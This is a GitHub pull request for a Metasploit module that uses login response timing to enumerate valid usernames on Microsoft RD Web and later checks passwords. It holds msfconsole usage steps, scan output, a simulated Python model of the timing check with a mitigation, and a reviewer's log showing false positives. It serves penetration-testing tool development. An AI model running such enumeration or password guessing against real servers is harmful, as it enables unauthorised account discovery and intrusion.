RDP Web Login User Enumeration Auxiliary Module #14544

Merged
merged 19 commits into from
Feb 24, 2021

Conversation

k0pak4
Contributor

@k0pak4 k0pak4 commented Dec 23, 2020

The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability that is present for OWA (see owa scanner modules). By analyzing the time it takes for a failed response, the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.

Verification

  • Start msfconsole
  • use auxiliary/scanner/http/rdp_web_login
  • set rhost TARGET_IP
  • set username USER_OR_FILE
  • set domain DOMAIN (Only if you don't want to test the domain discovery feature)
  • run
  • Check output for validity of your test username(s)/domain

Scenarios

Specific target output replaced with Ys so as not to disclose information

msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
username => /home/kali/users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
RHOSTS => YY.YYY.YYY.YY
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for YY.YYY.YYY.YY...
[+] Found Domain: YYYYYYYYYYYY
[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Version and OS

Tested against Microsoft IIS 10.0 and RDWeb 2019
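As an added illustration (not code from this PR or the module), the timing decision described above, modelled in Python with simulated response times: a name the endpoint answers within the 1250 ms window is reported valid, a name with no answer in that window is reported invalid, and a host that cannot be connected to gets its own verdict instead of being counted as an invalid name, which is the behaviour questioned later in this thread. The padded server shows the server-side mitigation: once every failed login takes at least as long as the slowest failure path, timing no longer separates the names. The account names, the millisecond values and the padding floor are constructed, and no network traffic is sent.

```python
from typing import Callable, Dict, List

# Constructed timing model. The numbers follow the transcript in this PR: a real
# account's bad-password failure came back in well under the 1250 ms window,
# while an unknown account produced no answer inside it.
TIMEOUT_MS = 1250.0
KNOWN_USERS = {"administrator", "msfuser"}   # constructed directory of valid names


class Unreachable(Exception):
    """No TCP/HTTP connection to the service could be made at all."""


def leaky_server(username: str) -> float:
    """Simulated RDWeb-style login endpoint (no network; timings are constants).

    Returns the response time in ms of a failed login attempt. The failure path
    for an unknown account is much slower than for a known one, which is the
    side channel the module relies on.
    """
    if username.lower() in KNOWN_USERS:
        return 85.0      # fast: account exists, password wrong
    return 1600.0        # slow: account does not exist


def offline_server(username: str) -> float:
    """Simulates the reviewer's first run: the service is not installed."""
    raise Unreachable("connection refused")


def pad_to_floor(server: Callable[[str], float], floor_ms: float) -> Callable[[str], float]:
    """Server-side mitigation: every failed login takes at least floor_ms.

    Choose floor_ms above the slowest failure path so that valid and invalid
    names are answered in the same window and timing no longer separates them.
    """
    def padded(username: str) -> float:
        return max(server(username), floor_ms)
    return padded


def classify(probe: Callable[[str], float], username: str,
             timeout_ms: float = TIMEOUT_MS) -> str:
    """Timing verdict for one username: 'valid', 'invalid' or 'unreachable'.

    A connection failure is its own verdict rather than being folded into
    'invalid', which is the behaviour questioned in the review thread.
    """
    try:
        elapsed = probe(username)
    except Unreachable:
        return "unreachable"
    return "invalid" if elapsed > timeout_ms else "valid"


def enumerate_users(probe: Callable[[str], float], usernames: List[str],
                    timeout_ms: float = TIMEOUT_MS) -> Dict[str, str]:
    """Classify each name; stop at the first unreachable verdict, since every
    later answer from a dead host would carry the same (empty) information."""
    verdicts: Dict[str, str] = {}
    for name in usernames:
        verdicts[name] = classify(probe, name, timeout_ms)
        if verdicts[name] == "unreachable":
            break
    return verdicts


def leaks_membership(probe: Callable[[str], float], usernames: List[str],
                     timeout_ms: float = TIMEOUT_MS) -> bool:
    """True when timing alone splits the list into valid and invalid names."""
    seen = set(enumerate_users(probe, usernames, timeout_ms).values())
    return {"valid", "invalid"} <= seen


if __name__ == "__main__":
    names = ["Administrator", "wrong", "k0pak4"]
    print("leaky server: ", enumerate_users(leaky_server, names))
    print("offline host: ", enumerate_users(offline_server, names))
    print("padded server:", enumerate_users(pad_to_floor(leaky_server, 2000.0), names))
```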

@gwillcox-r7 gwillcox-r7 added the docs, module and needs-linting labels Dec 23, 2020
@label-actions

label-actions bot commented Dec 23, 2020

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@gwillcox-r7
Contributor

@k0pak4 Can also run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/rdp_web_login.md and resolve any issues that are thrown up there to bring the documentation in line with our documentation standards. Feel free to reach out if anything is confusing though, I know there are some warnings like URLs which make the line too long that you can safely ignore.

@k0pak4
Contributor Author

k0pak4 commented Dec 23, 2020

> @k0pak4 Can also run tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/rdp_web_login.md and resolve any issues that are thrown up there to bring the documentation in line with our documentation standards. Feel free to reach out if anything is confusing though, I know there are some warnings like URLs which make the line too long that you can safely ignore.

I've fixed the outputs from running msftidy on the documentation and module, and additionally went through and cleaned up additional pylint warnings for PEP-8 compliance since this is a python module. Let me know if there's anything else I can do!

@acammack-r7
Contributor

Hi @k0pak4, this looks nifty! It looks like the endpoint you are hitting could take a password if we wanted it to. Do you think this could be converted to a full login scanner like https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/jenkins.rb ? Either way, we will want to capture the results of the user enumeration in the database. On the Ruby side, the report will need to look something like

The external module login reporting code in `def handle_credential_login(data, mod)` is pretty close to being able to handle this case, so after a little modification there and to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/metasploit/module.py you could report the username with something like module.report_valid_username(username, 'domain': domain).

@k0pak4
Contributor Author

k0pak4 commented Jan 7, 2021

> Hi @k0pak4, this looks nifty! It looks like the endpoint you are hitting could take a password if we wanted it to. Do you think this could be converted to a full login scanner like https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/jenkins.rb ? Either way, we will want to capture the results of the user enumeration in the database. On the Ruby side, the report will need to look something like
>
> The external module login reporting code in `def handle_credential_login(data, mod)` is pretty close to being able to handle this case, so after a little modification there and to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/metasploit/module.py you could report the username with something like module.report_valid_username(username, 'domain': domain).

Thanks! Yeah, it can take a password in the request as well. I'll first work on reporting the username enumeration to the database, because then the module will at least be complete and usable for that purpose and then afterwards work on converting it to a full login scanner with password checks too.

@k0pak4
Contributor Author

k0pak4 commented Jan 8, 2021

@acammack-r7 I was able to report valid usernames with my latest commit, but I don't think I'm adding on the domain correctly. It was my understanding I should add it to the realm field but when I do so it doesn't appear in the realm column of the creds output. Any thoughts on what I may be doing wrong to allow for handle_credential_login to accept domains and add them to the realm field?

@k0pak4
Contributor Author

k0pak4 commented Jan 9, 2021

@acammack-r7 I've now converted this to a full login scanner that can check passwords as well. I still am looking for assistance with the domain reporting, but it otherwise works as intended. I'll update the documentation as well early next week.

@k0pak4
Contributor Author

k0pak4 commented Jan 10, 2021

@acammack-r7 Alright documentation has been updated and the password feature is fully tested. Here's a screenshot of the usage if that helps with the review!

@bwatters-r7 bwatters-r7 self-assigned this Jan 15, 2021
@bwatters-r7
Contributor

Thanks for the contribution! I just ran through some basic testing on this using a Windows 2016 DC I have.

I am not sure if I am sold on the behavior when there's no connection

I'm not super familiar with login scanners, but a couple things struck me as odd. At first, I did not have the right service installed on the target, and when I ran it anyway, I got:

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.134.131...
[-] Login testdomain\test: is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If you cannot talk to the service, does that count as an invalid name? Is that normal for login scanners? I figure in the case of a TCP service, if no connection can be made, that's a separate error?

After I got the service up and running, I ran it again, and got the result I was expecting with a single name:

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.134.140...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 85.392 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host             origin           service          public         private  realm  private_type  JtR Format
----             ------           -------          ------         -------  -----  ------------  ----------
192.168.134.140  192.168.134.140  443/tcp (RDWeb)  Administrator                                


When I used a list, things got odd. For lack of anything else that appeared, I tossed the unix_users list; I figured that I knew `Administrator` was a known user, and that likely there would be some failed names in there, too. That said, all came back as valid users and were added to the database credential store.

msf6 auxiliary(scanner/http/rdp_web_login) > set username data/wordlists/unix_users.txt
username => data/wordlists/unix_users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.134.140...
[+] Password is invalid but testdomain\ is valid! Response received in 93.256 milliseconds
[+] Password is invalid but testdomain\4Dgifts is valid! Response received in 42.793 milliseconds
[+] Password is invalid but testdomain\abrt is valid! Response received in 41.709 milliseconds
[+] Password is invalid but testdomain\adm is valid! Response received in 42.495 milliseconds
[+] Password is invalid but testdomain\admin is valid! Response received in 27.624 milliseconds
[+] Password is invalid but testdomain\administrator is valid! Response received in 28.536 milliseconds
[+] Password is invalid but testdomain\anon is valid! Response received in 29.91 milliseconds
[+] Password is invalid but testdomain\_apt is valid! Response received in 31.567 milliseconds
[+] Password is invalid but testdomain\arpwatch is valid! Response received in 26.106 milliseconds
[+] Password is invalid but testdomain\auditor is valid! Response received in 29.287 milliseconds
[+] Password is invalid but testdomain\avahi is valid! Response received in 30.008 milliseconds
[+] Password is invalid but testdomain\avahi-autoipd is valid! Response received in 29.271 milliseconds
[+] Password is invalid but testdomain\backup is valid! Response received in 30.046 milliseconds
[+] Password is invalid but testdomain\bbs is valid! Response received in 31.462 milliseconds
[+] Password is invalid but testdomain\beef-xss is valid! Response received in 28.114 milliseconds
[+] Password is invalid but testdomain\bin is valid! Response received in 28.486 milliseconds
[+] Password is invalid but testdomain\bitnami is valid! Response received in 29.984 milliseconds
[+] Password is invalid but testdomain\checkfs is valid! Response received in 28.157 milliseconds
[+] Password is invalid but testdomain\checkfsys is valid! Response received in 30.602 milliseconds
[+] Password is invalid but testdomain\checksys is valid! Response received in 42.985 milliseconds
[+] Password is invalid but testdomain\chronos is valid! Response received in 25.831 milliseconds
[+] Password is invalid but testdomain\chrony is valid! Response received in 30.977 milliseconds
[+] Password is invalid but testdomain\cmwlogin is valid! Response received in 28.8 milliseconds
[+] Password is invalid but testdomain\cockpit-ws is valid! Response received in 29.969 milliseconds
[+] Password is invalid but testdomain\colord is valid! Response received in 43.406 milliseconds
[+] Password is invalid but testdomain\couchdb is valid! Response received in 31.596 milliseconds
[+] Password is invalid but testdomain\cups-pk-helper is valid! Response received in 29.135 milliseconds
[+] Password is invalid but testdomain\daemon is valid! Response received in 27.938 milliseconds
[+] Password is invalid but testdomain\dbadmin is valid! Response received in 44.315 milliseconds
[+] Password is invalid but testdomain\dbus is valid! Response received in 29.4 milliseconds
[+] Password is invalid but testdomain\Debian-exim is valid! Response received in 28.075 milliseconds
[+] Password is invalid but testdomain\Debian-snmp is valid! Response received in 29.583 milliseconds
[+] Password is invalid but testdomain\demo is valid! Response received in 44.043 milliseconds
[+] Password is invalid but testdomain\demos is valid! Response received in 28.791 milliseconds
[+] Password is invalid but testdomain\diag is valid! Response received in 28.616 milliseconds
[+] Password is invalid but testdomain\distccd is valid! Response received in 28.294 milliseconds
[+] Password is invalid but testdomain\dni is valid! Response received in 28.283 milliseconds
[+] Password is invalid but testdomain\dnsmasq is valid! Response received in 30.788 milliseconds
[+] Password is invalid but testdomain\dradis is valid! Response received in 27.195 milliseconds
[+] Password is invalid but testdomain\EZsetup is valid! Response received in 29.497 milliseconds
[+] Password is invalid but testdomain\fal is valid! Response received in 29.376 milliseconds
[+] Password is invalid but testdomain\fax is valid! Response received in 29.561 milliseconds
[+] Password is invalid but testdomain\ftp is valid! Response received in 30.883 milliseconds
[+] Password is invalid but testdomain\games is valid! Response received in 27.408 milliseconds
[+] Password is invalid but testdomain\gdm is valid! Response received in 29.772 milliseconds
[+] Password is invalid but testdomain\geoclue is valid! Response received in 29.912 milliseconds
[+] Password is invalid but testdomain\gnats is valid! Response received in 30.083 milliseconds
[+] Password is invalid but testdomain\gnome-initial-setup is valid! Response received in 26.477 milliseconds
[+] Password is invalid but testdomain\gopher is valid! Response received in 32.472 milliseconds
[+] Password is invalid but testdomain\gropher is valid! Response received in 29.908 milliseconds
[+] Password is invalid but testdomain\guest is valid! Response received in 28.552 milliseconds
[+] Password is invalid but testdomain\haldaemon is valid! Response received in 30.46 milliseconds
[+] Password is invalid but testdomain\halt is valid! Response received in 26.979 milliseconds
[+] Password is invalid but testdomain\hplip is valid! Response received in 29.929 milliseconds
[+] Password is invalid but testdomain\inetsim is valid! Response received in 29.773 milliseconds
[+] Password is invalid but testdomain\informix is valid! Response received in 29.195 milliseconds
[+] Password is invalid but testdomain\install is valid! Response received in 30.223 milliseconds
[+] Password is invalid but testdomain\iodine is valid! Response received in 29.879 milliseconds
[+] Password is invalid but testdomain\irc is valid! Response received in 29.625 milliseconds
[+] Password is invalid but testdomain\jet is valid! Response received in 25.644 milliseconds
[+] Password is invalid but testdomain\karaf is valid! Response received in 29.976 milliseconds
[+] Password is invalid but testdomain\kernoops is valid! Response received in 29.907 milliseconds
[+] Password is invalid but testdomain\king-phisher is valid! Response received in 28.439 milliseconds
[+] Password is invalid but testdomain\landscape is valid! Response received in 29.462 milliseconds
[+] Password is invalid but testdomain\libstoragemgmt is valid! Response received in 30.125 milliseconds
[+] Password is invalid but testdomain\libuuid is valid! Response received in 29.914 milliseconds
[+] Password is invalid but testdomain\lightdm is valid! Response received in 29.944 milliseconds
[+] Password is invalid but testdomain\list is valid! Response received in 29.758 milliseconds
[+] Password is invalid but testdomain\listen is valid! Response received in 29.966 milliseconds
[+] Password is invalid but testdomain\lp is valid! Response received in 29.955 milliseconds
[+] Password is invalid but testdomain\lpadm is valid! Response received in 29.353 milliseconds
[+] Password is invalid but testdomain\lpadmin is valid! Response received in 29.861 milliseconds
[+] Password is invalid but testdomain\lxd is valid! Response received in 29.912 milliseconds
[+] Password is invalid but testdomain\lynx is valid! Response received in 29.071 milliseconds
[+] Password is invalid but testdomain\mail is valid! Response received in 29.076 milliseconds
[+] Password is invalid but testdomain\man is valid! Response received in 30.723 milliseconds
[+] Password is invalid but testdomain\me is valid! Response received in 27.413 milliseconds
[+] Password is invalid but testdomain\messagebus is valid! Response received in 27.767 milliseconds
[+] Password is invalid but testdomain\miredo is valid! Response received in 28.103 milliseconds
[+] Password is invalid but testdomain\mountfs is valid! Response received in 29.667 milliseconds
[+] Password is invalid but testdomain\mountfsys is valid! Response received in 30.439 milliseconds
[+] Password is invalid but testdomain\mountsys is valid! Response received in 27.17 milliseconds
[+] Password is invalid but testdomain\mysql is valid! Response received in 28.897 milliseconds
[+] Password is invalid but testdomain\news is valid! Response received in 29.887 milliseconds
[+] Password is invalid but testdomain\noaccess is valid! Response received in 29.453 milliseconds
[+] Password is invalid but testdomain\nobody is valid! Response received in 29.063 milliseconds
[+] Password is invalid but testdomain\nobody4 is valid! Response received in 29.637 milliseconds
[+] Password is invalid but testdomain\ntp is valid! Response received in 29.604 milliseconds
[+] Password is invalid but testdomain\nuucp is valid! Response received in 29.737 milliseconds
[+] Password is invalid but testdomain\nxautomation is valid! Response received in 30.401 milliseconds
[+] Password is invalid but testdomain\nxpgsql is valid! Response received in 31.543 milliseconds
[+] Password is invalid but testdomain\omi is valid! Response received in 25.966 milliseconds
[+] Password is invalid but testdomain\omsagent is valid! Response received in 29.734 milliseconds
[+] Password is invalid but testdomain\operator is valid! Response received in 28.855 milliseconds
[+] Password is invalid but testdomain\oracle is valid! Response received in 29.431 milliseconds
[+] Password is invalid but testdomain\OutOfBox is valid! Response received in 27.995 milliseconds
[+] Password is invalid but testdomain\pi is valid! Response received in 30.041 milliseconds
[+] Password is invalid but testdomain\polkitd is valid! Response received in 28.49 milliseconds
[+] Password is invalid but testdomain\pollinate is valid! Response received in 29.972 milliseconds
[+] Password is invalid but testdomain\popr is valid! Response received in 29.755 milliseconds
[+] Password is invalid but testdomain\postfix is valid! Response received in 29.687 milliseconds
[+] Password is invalid but testdomain\postgres is valid! Response received in 29.699 milliseconds
[+] Password is invalid but testdomain\postmaster is valid! Response received in 29.799 milliseconds
[+] Password is invalid but testdomain\printer is valid! Response received in 29.826 milliseconds
[+] Password is invalid but testdomain\proxy is valid! Response received in 30.139 milliseconds
[+] Password is invalid but testdomain\pulse is valid! Response received in 29.851 milliseconds
[+] Password is invalid but testdomain\redsocks is valid! Response received in 30.334 milliseconds
[+] Password is invalid but testdomain\rfindd is valid! Response received in 27.733 milliseconds
[+] Password is invalid but testdomain\rje is valid! Response received in 29.325 milliseconds
[+] Password is invalid but testdomain\root is valid! Response received in 27.267 milliseconds
[+] Password is invalid but testdomain\ROOT is valid! Response received in 29.647 milliseconds
[+] Password is invalid but testdomain\rooty is valid! Response received in 29.882 milliseconds
[+] Password is invalid but testdomain\rpc is valid! Response received in 29.919 milliseconds
[+] Password is invalid but testdomain\rpcuser is valid! Response received in 29.325 milliseconds
[+] Password is invalid but testdomain\rtkit is valid! Response received in 29.591 milliseconds
[+] Password is invalid but testdomain\rwhod is valid! Response received in 30.033 milliseconds
[+] Password is invalid but testdomain\saned is valid! Response received in 29.769 milliseconds
[+] Password is invalid but testdomain\service is valid! Response received in 29.486 milliseconds
[+] Password is invalid but testdomain\setroubleshoot is valid! Response received in 29.812 milliseconds
[+] Password is invalid but testdomain\setup is valid! Response received in 30.216 milliseconds
[+] Password is invalid but testdomain\sgiweb is valid! Response received in 30.364 milliseconds
[+] Password is invalid but testdomain\shutdown is valid! Response received in 26.636 milliseconds
[+] Password is invalid but testdomain\sigver is valid! Response received in 28.723 milliseconds
[+] Password is invalid but testdomain\speech-dispatcher is valid! Response received in 30.438 milliseconds
[+] Password is invalid but testdomain\sshd is valid! Response received in 34.81 milliseconds
[+] Password is invalid but testdomain\sslh is valid! Response received in 29.277 milliseconds
[+] Password is invalid but testdomain\sssd is valid! Response received in 29.215 milliseconds
[+] Password is invalid but testdomain\stunnel4 is valid! Response received in 30.319 milliseconds
[+] Password is invalid but testdomain\sym is valid! Response received in 29.646 milliseconds
[+] Password is invalid but testdomain\symop is valid! Response received in 29.873 milliseconds
[+] Password is invalid but testdomain\sync is valid! Response received in 30.597 milliseconds
[+] Password is invalid but testdomain\sys is valid! Response received in 29.216 milliseconds
[+] Password is invalid but testdomain\sysadm is valid! Response received in 29.796 milliseconds
[+] Password is invalid but testdomain\sysadmin is valid! Response received in 29.592 milliseconds
[+] Password is invalid but testdomain\sysbin is valid! Response received in 30.924 milliseconds
[+] Password is invalid but testdomain\syslog is valid! Response received in 25.953 milliseconds
[+] Password is invalid but testdomain\system_admin is valid! Response received in 30.208 milliseconds
[+] Password is invalid but testdomain\systemd-bus-proxy is valid! Response received in 29.813 milliseconds
[+] Password is invalid but testdomain\systemd-coredump is valid! Response received in 30.687 milliseconds
[+] Password is invalid but testdomain\systemd-network is valid! Response received in 27.133 milliseconds
[+] Password is invalid but testdomain\systemd-resolve is valid! Response received in 28.76 milliseconds
[+] Password is invalid but testdomain\systemd-timesync is valid! Response received in 30.245 milliseconds
[+] Password is invalid but testdomain\tcpdump is valid! Response received in 29.308 milliseconds
[+] Password is invalid but testdomain\trouble is valid! Response received in 30.299 milliseconds
[+] Password is invalid but testdomain\tss is valid! Response received in 29.729 milliseconds
[+] Password is invalid but testdomain\udadmin is valid! Response received in 29.411 milliseconds
[+] Password is invalid but testdomain\ultra is valid! Response received in 30.004 milliseconds
[+] Password is invalid but testdomain\umountfs is valid! Response received in 30.01 milliseconds
[+] Password is invalid but testdomain\umountfsys is valid! Response received in 29.724 milliseconds
[+] Password is invalid but testdomain\umountsys is valid! Response received in 29.792 milliseconds
[+] Password is invalid but testdomain\unix is valid! Response received in 30.782 milliseconds
[+] Password is invalid but testdomain\unscd is valid! Response received in 26.649 milliseconds
[+] Password is invalid but testdomain\us_admin is valid! Response received in 28.439 milliseconds
[+] Password is invalid but testdomain\usbmux is valid! Response received in 30.004 milliseconds
[+] Password is invalid but testdomain\user is valid! Response received in 30.362 milliseconds
[+] Password is invalid but testdomain\uucp is valid! Response received in 28.951 milliseconds
[+] Password is invalid but testdomain\uucpadm is valid! Response received in 29.989 milliseconds
[+] Password is invalid but testdomain\uuidd is valid! Response received in 30.668 milliseconds
[+] Password is invalid but testdomain\vagrant is valid! Response received in 28.999 milliseconds
[+] Password is invalid but testdomain\varnish is valid! Response received in 26.632 milliseconds
[+] Password is invalid but testdomain\web is valid! Response received in 30.121 milliseconds
[+] Password is invalid but testdomain\webmaster is valid! Response received in 28.993 milliseconds
[+] Password is invalid but testdomain\whoopsie is valid! Response received in 29.762 milliseconds
[+] Password is invalid but testdomain\www is valid! Response received in 29.953 milliseconds
[+] Password is invalid but testdomain\www-data is valid! Response received in 29.646 milliseconds
[+] Password is invalid but testdomain\xpdb is valid! Response received in 29.969 milliseconds
[+] Password is invalid but testdomain\xpopr is valid! Response received in 30.504 milliseconds
[+] Password is invalid but testdomain\zabbix is valid! Response received in 28.106 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.134.140 192.168.134.140 443/tcp (RDWeb) Administrator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) msfuser
192.168.134.140 192.168.134.140 443/tcp (RDWeb)
192.168.134.140 192.168.134.140 443/tcp (RDWeb) 4Dgifts
192.168.134.140 192.168.134.140 443/tcp (RDWeb) abrt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) adm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) admin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) administrator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) anon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) _apt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) arpwatch
192.168.134.140 192.168.134.140 443/tcp (RDWeb) auditor
192.168.134.140 192.168.134.140 443/tcp (RDWeb) avahi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) avahi-autoipd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) backup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bbs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) beef-xss
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) bitnami
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checkfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checkfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) checksys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) chronos
192.168.134.140 192.168.134.140 443/tcp (RDWeb) chrony
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cmwlogin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cockpit-ws
192.168.134.140 192.168.134.140 443/tcp (RDWeb) colord
192.168.134.140 192.168.134.140 443/tcp (RDWeb) couchdb
192.168.134.140 192.168.134.140 443/tcp (RDWeb) cups-pk-helper
192.168.134.140 192.168.134.140 443/tcp (RDWeb) daemon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dbadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dbus
192.168.134.140 192.168.134.140 443/tcp (RDWeb) Debian-exim
192.168.134.140 192.168.134.140 443/tcp (RDWeb) Debian-snmp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) demo
192.168.134.140 192.168.134.140 443/tcp (RDWeb) demos
192.168.134.140 192.168.134.140 443/tcp (RDWeb) diag
192.168.134.140 192.168.134.140 443/tcp (RDWeb) distccd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dni
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dnsmasq
192.168.134.140 192.168.134.140 443/tcp (RDWeb) dradis
192.168.134.140 192.168.134.140 443/tcp (RDWeb) EZsetup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) fal
192.168.134.140 192.168.134.140 443/tcp (RDWeb) fax
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ftp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) games
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gdm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) geoclue
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gnats
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gnome-initial-setup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gopher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) gropher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) guest
192.168.134.140 192.168.134.140 443/tcp (RDWeb) haldaemon
192.168.134.140 192.168.134.140 443/tcp (RDWeb) halt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) hplip
192.168.134.140 192.168.134.140 443/tcp (RDWeb) inetsim
192.168.134.140 192.168.134.140 443/tcp (RDWeb) informix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) install
192.168.134.140 192.168.134.140 443/tcp (RDWeb) iodine
192.168.134.140 192.168.134.140 443/tcp (RDWeb) irc
192.168.134.140 192.168.134.140 443/tcp (RDWeb) jet
192.168.134.140 192.168.134.140 443/tcp (RDWeb) karaf
192.168.134.140 192.168.134.140 443/tcp (RDWeb) kernoops
192.168.134.140 192.168.134.140 443/tcp (RDWeb) king-phisher
192.168.134.140 192.168.134.140 443/tcp (RDWeb) landscape
192.168.134.140 192.168.134.140 443/tcp (RDWeb) libstoragemgmt
192.168.134.140 192.168.134.140 443/tcp (RDWeb) libuuid
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lightdm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) list
192.168.134.140 192.168.134.140 443/tcp (RDWeb) listen
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lpadm
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lpadmin
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lxd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) lynx
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mail
192.168.134.140 192.168.134.140 443/tcp (RDWeb) man
192.168.134.140 192.168.134.140 443/tcp (RDWeb) me
192.168.134.140 192.168.134.140 443/tcp (RDWeb) messagebus
192.168.134.140 192.168.134.140 443/tcp (RDWeb) miredo
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountfs
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountfsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mountsys
192.168.134.140 192.168.134.140 443/tcp (RDWeb) mysql
192.168.134.140 192.168.134.140 443/tcp (RDWeb) news
192.168.134.140 192.168.134.140 443/tcp (RDWeb) noaccess
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nobody
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nobody4
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ntp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nuucp
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nxautomation
192.168.134.140 192.168.134.140 443/tcp (RDWeb) nxpgsql
192.168.134.140 192.168.134.140 443/tcp (RDWeb) omi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) omsagent
192.168.134.140 192.168.134.140 443/tcp (RDWeb) operator
192.168.134.140 192.168.134.140 443/tcp (RDWeb) oracle
192.168.134.140 192.168.134.140 443/tcp (RDWeb) OutOfBox
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pi
192.168.134.140 192.168.134.140 443/tcp (RDWeb) polkitd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pollinate
192.168.134.140 192.168.134.140 443/tcp (RDWeb) popr
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postfix
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postgres
192.168.134.140 192.168.134.140 443/tcp (RDWeb) postmaster
192.168.134.140 192.168.134.140 443/tcp (RDWeb) printer
192.168.134.140 192.168.134.140 443/tcp (RDWeb) proxy
192.168.134.140 192.168.134.140 443/tcp (RDWeb) pulse
192.168.134.140 192.168.134.140 443/tcp (RDWeb) redsocks
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rfindd
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rje
192.168.134.140 192.168.134.140 443/tcp (RDWeb) root
192.168.134.140 192.168.134.140 443/tcp (RDWeb) ROOT
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rooty
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rpc
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rpcuser
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rtkit
192.168.134.140 192.168.134.140 443/tcp (RDWeb) rwhod
192.168.134.140 192.168.134.140 443/tcp (RDWeb) saned
192.168.134.140 192.168.134.140 443/tcp (RDWeb) service
192.168.134.140 192.168.134.140 443/tcp (RDWeb) setroubleshoot
192.168.134.140 192.168.134.140 443/tcp (RDWeb) setup
192.168.134.140 192.168.134.140 443/tcp (RDWeb) sgiweb
